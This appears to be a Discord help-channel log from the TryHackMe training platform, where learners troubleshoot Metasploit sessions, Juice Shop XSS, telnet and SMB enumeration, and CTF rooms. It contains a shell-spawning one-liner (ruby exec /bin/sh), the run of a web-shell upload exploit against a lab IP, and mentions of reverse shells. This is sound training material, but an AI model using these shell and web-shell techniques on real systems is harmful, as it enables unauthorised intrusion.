But shell needs python to be installed in the target computer, right? When I did it it looked for its binaries

Find out!

meterpreter may look for others too. there is ruby,.... too ig

Don't think so

I see!

ah found it, it searches for things that give us shell ig

i saw that it said it used python for popping shell

And metasploit always uses an exploit and a payload, right?

And the exploit is like the way to get in and the payload what it does once it's in, correct?

An exploit is used to deliver a payload, correct.

if sys has ruby in it. meterpreter does this command ig ruby -e 'exec "/bin/sh"'

And different payloads are used differently, right? like different commands from the ones in meterpreter

Metasploit looks super cool to me, but also so big that it's confusing :S

Check gtfo bin, and will find binaries that have shell exec, so meterpreter tries shell commands and find out which one it is

I just came back and my machine expires in 7 minutes

Metasploit speedrun

I just did shell, so I'll try cd to that dir

Now it doesnt have a feedback

You can extend it

I'm not premium this time

u can extent without premium ig

Oh wait, I could :0

You are right ahahahah

You can still extend the target machines

Just not the attackbox

Ohh fine

Then it's not a speedrun anymore

or try restarting the box and do the exploit again, wont do any harm

only if it still dont work

Can I do that without premium too? I thought I needed to be premium for that

IIRC msf shells are a bit weird

Sure, I can restart it

Like you need to background then foreground then it works well

I can do that

I didn't restart the target machine, but I hope this does it

Or maybe I broke something in it? 🤔

Okay, so now everything worked just fine

I just finished the section. All I needed to do was to kill the first two sessions

Thank you so much! 🙏

And about metasploit, meterpreter is the only payload I've ever used

Are the other payloads like this one? I mean this interactive

I expected payload to be more like a script that would run some code and finish

Hello everyone. I was finishing Juice Shop and noticed the persistent XSS is broken. I tried some other things, it was working but not returning the green header with the hash. Then read the write-ups, used the same payloads and still not working. Anyone else facing this issue? Tried looking in the score-card if it was there but no luck

Please do not provide or ask for help or hints for the Different CTF room until 19th April, 7pm (UTC) 🙂

who did the room; Different CTF?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

ahw cool.

Heloo, anyone can help me on the beginner room called "network services"? I'm stuck on Telnet, after I connected to tenet it does not display any welcome message, nmap fingerprint also doesnot show anything.
Nmap returns an open tcp port (non standard for telnet), I connect using "telnet ip port", result:
Trying ip <ip>...
Connected to ...
Escape character is ...
and that's it

I'm not sure if I remember it correctly, but maybe I can help you

I you are still stuck, it has been a long time

Basicly I remember I had a problem in that room too, because for anything to run you need to write .RUN in front of it

That's strange, I completed the same room today and I could see the welcome message

So, for example, instead of:
ping 10.X.Y.Z -c 1

You should write:
.RUN ping 10.X.Y.Z -c 1

And I think telnet didn't have any feedback, so you won't see errors when you type things in it

I don't remember, did you have to connect to the tcp port?

Because maybe that's why it's not working for them

He said something about an open tcp port

Yes I had to connect

Oh okay, then nevermind

It also showed up in the nmap fingerprint

@white salmon is it a 4 digit port number? (Avoiding spoilers haha)

@white salmon Just ran through the room. Are you sure you are typing the telnet connection right?

if you are, the welcome message should contain the username you enumerated previously

Hello All, I am working on the OWASP top 10 task 29. I have found the exploit to run however I get this when I run it:

`python 47887.py http://10.10.196.202/admin_add.php 1 ⨯

Attempting to upload PHP web shell...
Traceback (most recent call last):
File "47887.py", line 28, in <module>
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 530, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 665, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 166, in resolve_redirects
requests.exceptions.TooManyRedirects: Exceeded 30 redirects.`

did you try without the admin_add.php bit at the beginning?

Yes

i would try redownloading the exploit and running the file again. im assuming you've done that bit too though?

Not yet. Is there a package I could be missing? This is from my VM not the browser based one

looks like it's the proper exploit, just timed out after too many redirects. you could try again on the THM attack box if redownloading the exploit doesn't work tho

what do you mean, there is nothing about it in the room description

yes, 4 digits, I assume there is a single telnet open.

That's why I had problems with it. Anyway I know it because I took notes back then, maybe it's wrong

I didn't try it today

like I said, telnet <ip> <port grabbed from nmap>

Anyone got a second to help me out with a question in the uploadvulns room?

Nvm, im dumb and had included my targets IP in the reverse shell code instead of my attack IP 😆

DId you try restarting the machine?

Hello, I'm new in the world of contrast and when I start learning suspended in a question I did not unterstand

Did anyone solved the room "Different CTF". I got stuck after finding the secret directory. Can anyone help ?

i`m stuck at web enumeration cant find the flag in those two vhosts at practical gobuster

you talking about DIfferent CTF? @harsh cove

Thanks man

web enumeration room

ahw cool!

I know, it's too early to ask for hint for Different CTF, but does anyone have an idea for finding secret directory?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

@high onyx @white salmon no help or hints yet...

Ah, ok then...

I deleted the hint @stuck fractal

i have reached far

okk

can someone help me about this question
i tried exploit/username/password etc. but i couldnt find what it is.
https://tryhackme.com/room/networkservices
task 3.
https://cdn.discordapp.com/attachments/522158539129618453/832959740937109554/20210417_154245.jpg

Did you list the share names?

Because none of those are correct for share names.

i actually didnt get what it means

Well you need to do that first

i did enum4linux ip -A

You can list the shares with either Enum4linux or smbclient

ok, ill look at it

ok done thanks james

anyone done 'Different CTF' room and can dm me? I think i've gotten an initial foothold but been stuck for a while...can share what I have already if needed

can i get hint there is already hint but i can't figure it out

root (MiTRE)

Task 5

Hi, in OWASP Juice Shop room task 7, i added the header, logged back to the admin account and to the Last Login IP page, i got the alert but didn't get any flag, i restarted the machine and tried different browser. what should i do?

@high onyx The announcements are not gonna made till 19th.

Yeah, you're right. I missed that 😐

I need a hint for the pickle rick room pls

i cant find anything really useful, ive found the username but thats about it

So in ICE, I picked the first exploit listed for the target box, but when I type use (full path) it says no payload configured, defaulting to blah

Which I attempted after I backgrounded my session

That's fine

What was the point if it was just gonna say I can't anyway

What?

Can't what?

It's having me do that, but it's saying no payload configured and defaulting to blah

That is not a problem. Why do you think it's a problem? The payload is somewhat independent of the exploit.

Well, I guess I'm easking is it "selected" with the use command and path I attempte4d?

Oooh it did work

Nvm

Yes. The payload is distinct from the exploit. The exploit is used to deliver a payload.

Though I don't see that I have elevated privs